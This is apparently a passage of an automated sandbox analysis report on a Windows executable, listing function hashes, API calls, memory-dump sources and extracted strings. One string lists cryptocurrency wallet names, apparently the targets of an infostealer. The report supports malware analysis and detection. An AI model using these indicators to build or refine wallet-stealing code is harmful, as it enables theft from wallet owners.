                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1239891234-578493202
                                                                                                                                                                  • Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                  • Instruction ID: 5065749e18068b0fb77195cb43080aeb3e85ff67334eec665853237ec92f2301
                                                                                                                                                                  • Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D317C36608F8186DB60DB25EC406AEB7B4FB98764F904136EA9D53BA8DF3CD145CB10
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: ' is not a number.$*L\(&.
                                                                                                                                                                  • API String ID: 3668304517-2927676846
                                                                                                                                                                  • Opcode ID: 45bcc056e11c8b050fce0dff7f9fb24e3d14619776c4fe604155b1fe59233918
                                                                                                                                                                  • Instruction ID: 74a2c0bff8e30920b97d9b5558ce8332e9291d0a6eecfbc5c5e63bc7f336427b
                                                                                                                                                                  • Opcode Fuzzy Hash: 45bcc056e11c8b050fce0dff7f9fb24e3d14619776c4fe604155b1fe59233918
                                                                                                                                                                  • Instruction Fuzzy Hash: A2D1E622E18BC185E710DB74D8407ADB771FBA57A8F905236EE9C17A99DF38E180CB50
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                  • Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                  • Instruction ID: 9f05511ecaa649cbb2f4445c4ff43ec3e1beb844dd0acb5133eb09b4f2c77056
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                  • Instruction Fuzzy Hash: AE313D72609B8186EB609F60E8807EDA374FB94754F84403ADB8E57B98DF7CD548CB20
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                  • String ID: *L\(&.$0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                  • API String ID: 593203224-2147910804
                                                                                                                                                                  • Opcode ID: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                  • Instruction ID: 54aac84efac3cdab5051bf05061ebcb8e7b73105204416231943096d236821df
                                                                                                                                                                  • Opcode Fuzzy Hash: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                  • Instruction Fuzzy Hash: ABE2B662A0C6C589EB51AF29C85037CB7A1EB71FA8F948132DACD47396CE3DD845C720
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6B9B
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6BC0
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6BEA
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6C7B
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E5712
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E5718
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                  • API String ID: 4156930308-767241296
                                                                                                                                                                  • Opcode ID: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                  • Instruction ID: d79d6f836758a73e827b189e198bf481798d7cce014e561b79408b1f3b920dbf
                                                                                                                                                                  • Opcode Fuzzy Hash: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4672B222A0C6C189EB51AE69C85037CB7A1EB31FA8F948132DA9D4B395DF3DD855C720
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 73155330-3631139435
                                                                                                                                                                  • Opcode ID: 2ee202328b28e1bb6b42e951aba61e2543bfbd89fe68a6802938e53a50f09bcd
                                                                                                                                                                  • Instruction ID: 0acb44dcc35704c86da2f36cce6ae002ade8ad8ae4cc0d4db7f7535f04b2d1af
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ee202328b28e1bb6b42e951aba61e2543bfbd89fe68a6802938e53a50f09bcd
                                                                                                                                                                  • Instruction Fuzzy Hash: D371D522F24B9595E700EB71EC402BDA371FBA9794F955232EE8C23A85DF78E580C750
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9F2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9F2A68
                                                                                                                                                                    • Part of subcall function 00007FF72C9F2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9F2A6E
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9DFD57
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
                                                                                                                                                                  • API String ID: 4131450254-3699005852
                                                                                                                                                                  • Opcode ID: 0b546105d5c83c6727593434cef8828a98e34086d396aed44443c3a47580aaec
                                                                                                                                                                  • Instruction ID: 8c0ac3d234c819f9a489d9bb4150543a5a538ee75e2d729f65cf8c36cef418c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b546105d5c83c6727593434cef8828a98e34086d396aed44443c3a47580aaec
                                                                                                                                                                  • Instruction Fuzzy Hash: 38D1A672A08B4142EA24FB15E85537EE3A1FBA5B94F804132DACE57B99DF3DE441CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1791019856-578493202
                                                                                                                                                                  • Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                  • Instruction ID: fe9273e178843d10daaf1028c6a72310e1e1783bf9ea016d5a09e36497d43f9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 63619032A0858286EB34AF19F840B7DA3B1FB64765F845135CB9E93694DFBCE4518B20
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF72C9F23CB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                  • API String ID: 389471666-631824599
                                                                                                                                                                  • Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                  • Instruction ID: 10c6188e4aedf64f247b4e0e3272f7fb4bf4c94c352af47c959befc0802e2b8b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                  • Instruction Fuzzy Hash: B7118F32608B52A7E744AB22ED51779B2B4FF64760F804135C74D42A54EFBCE4B4CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                  • Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                  • Instruction ID: 6ba8e198d1e501bdddfc6f81f90c3d73b34af796d4ffc76733d14d3ee637effe
                                                                                                                                                                  • Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                  • Instruction Fuzzy Hash: 7801C472B0C7C182E7519B11B840B7AB7A1F7A87A5F848036DA8906A98CF3CD501CF51
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.$assert json failed$in Json::Value::operator[](ArrayIndex): requires arrayValue
                                                                                                                                                                  • API String ID: 0-448520649
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1807457897-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue$InfoLocale
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 673564084-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF72CA08D1B,?,?,?,?,?,?,?,?,00000000,00007FF72CA136B0), ref: 00007FF72CA088C3
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2099609381-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 73155330-0
                                                                                                                                                                  • Opcode ID: f1f6c8a2cc95e2b91cb7107076a8c5cb21c1f7d95be88b1eb0dde1ebd421c5a1
                                                                                                                                                                  • Instruction ID: 19af0660019a269152451f10a68a97e17e6be87929837ab2392c75f90c1c6c9d
                                                                                                                                                                  • Opcode Fuzzy Hash: f1f6c8a2cc95e2b91cb7107076a8c5cb21c1f7d95be88b1eb0dde1ebd421c5a1
                                                                                                                                                                  • Instruction Fuzzy Hash: C0E10262A18B8581DA10EF15D84827DB3A4FB68FE4F958631DF9D2378ADF38D490C750
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                  • Opcode ID: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                  • Instruction ID: 2399c038e88a52d9c870b470b35a21ab2afe992f96a57beb99821f3e5e94053c
                                                                                                                                                                  • Opcode Fuzzy Hash: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 27B17C73600B888BEB15DF29D84676C7BB0F754B98F588822DB9D837A4CB3AD451CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF72CA0EDC1
                                                                                                                                                                    • Part of subcall function 00007FF72CA087C4: HeapAlloc.KERNEL32(?,?,00000000,00007FF72CA0715E,?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?), ref: 00007FF72CA08819
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                    • Part of subcall function 00007FF72CA16E8C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA16EBF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 916656526-578493202
                                                                                                                                                                  • Opcode ID: 0f7034db78e482fe59dc97eac92670abfaab9c33c17a880f9e808be5542b9086
                                                                                                                                                                  • Instruction ID: def763b1d3375fc73bef09a3b1f30c8237474699e8fed1971c03fad05d4b6774
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f7034db78e482fe59dc97eac92670abfaab9c33c17a880f9e808be5542b9086
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F41FB21B2928742F7607A327C11F79E2B0EFA1BE0F845535DE8D47785DE3CE4019A20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                  • Opcode ID: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                  • Instruction ID: b2f509da5f6551f7e9d39ea006b1a76b610816c3e8f8595839e22eedcaa38392
                                                                                                                                                                  • Opcode Fuzzy Hash: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                  • Instruction Fuzzy Hash: E2516822B182C546F7249A35AC04B69BBA1F764BE4F88C231CB9987AC5DE3DD805CB10
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.$Value is not convertible to double.
                                                                                                                                                                  • API String ID: 0-3518352406
                                                                                                                                                                  • Opcode ID: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                  • Instruction ID: a89623c8ef6c668bc49b47ece1aad2984132d532de0e15e2d74e13fa68750d7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F31E721E1C98245FA62F734E8623B9D3A1FFFA724FC44132D68E52695EE2DE141CE10
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 12414fa0cc38e188fbb466e1c36ac0ca271386ebc649a9602594163aab2e07d8
                                                                                                                                                                  • Instruction ID: fc8922f3a2b92797d829d42626bc19d55ac939d59db45695d408a8fe355d5760
                                                                                                                                                                  • Opcode Fuzzy Hash: 12414fa0cc38e188fbb466e1c36ac0ca271386ebc649a9602594163aab2e07d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 45E16132A04B8186E720DB61F8506EEB7B4FBA4798F404635DB8D53B96EF78E245C710
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  • Opcode ID: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                  • Instruction ID: 55fc3e3704bc1cb88d2ca53f8c68be7f28d4be8ce68acba419e5f2e39a5063f4
                                                                                                                                                                  • Opcode Fuzzy Hash: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                  • Instruction Fuzzy Hash: 4BD10932A0864281EB69AF29C95027DA3A8FF65B68F944135CE8D077D4CF7DE845CB60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF72CA1484F,?,00000000,00000092,?,?,00000000,?,00007FF72CA04DC1), ref: 00007FF72CA140FE
                                                                                                                                                                  Memory Dump Source
